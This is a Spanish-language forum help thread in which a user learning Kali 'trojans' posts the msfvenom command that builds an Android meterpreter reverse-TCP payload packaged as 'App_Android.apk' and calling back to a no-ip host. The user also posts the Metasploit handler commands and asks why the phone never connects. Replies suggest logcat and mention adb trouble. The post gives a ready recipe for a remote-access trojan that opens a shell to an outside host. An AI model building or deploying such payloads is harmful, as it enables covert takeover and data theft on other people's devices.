hola buenas a todos eh empesado a practicar con los troyanos de kali , comenze con uno para android pero no me conecta y no se en que me estoy equivocando , los puertos en el router ya los abri pero no encuentro mi error , les dejo el code de como lo hago

en la terminal

Código: Seleccionar todo

root@# msfvenom -p android/meterpreter/reverse_tcp LHOST=ejemplo.noip LPORT=4444 > App_Android.apk
luego en el metasploit framework

Código: Seleccionar todo

use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp options set LHOST ejemplo.noip set LPORT 4444 run
cuando ejecuto el apk en el movil no funca no se porque , saludos y gracias.
vas a tener que pegarle una mirada al logcat para descartar si no te esta rompiendo la ejecución
[Enlace externo eliminado para invitados]

Código: Seleccionar todo

{******************************************************************************}
{** WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING  **}
{******************************************************************************}
{**                                                                          **}
{** The prototypes, declarations and information in this file has been       **}
{** compiled from various sources as well as through reverse engineering     **}
{** techniques. We make no guarantee as to the correctness of the contents.  **}
{** Caution is recommended, USE AT YOUR OWN RISK.                            **}
{**                                                                          **}
{******************************************************************************}
hola gracias por responder , adb logcat se me queda en "Waiting for devices" , no se si lo e usado bien aclaro que tengo a kali en una maquina virtual bien configurada con el adaptador de red lan, gracias espero solucionarlo.
Responder

Volver a “Dudas y Preguntas”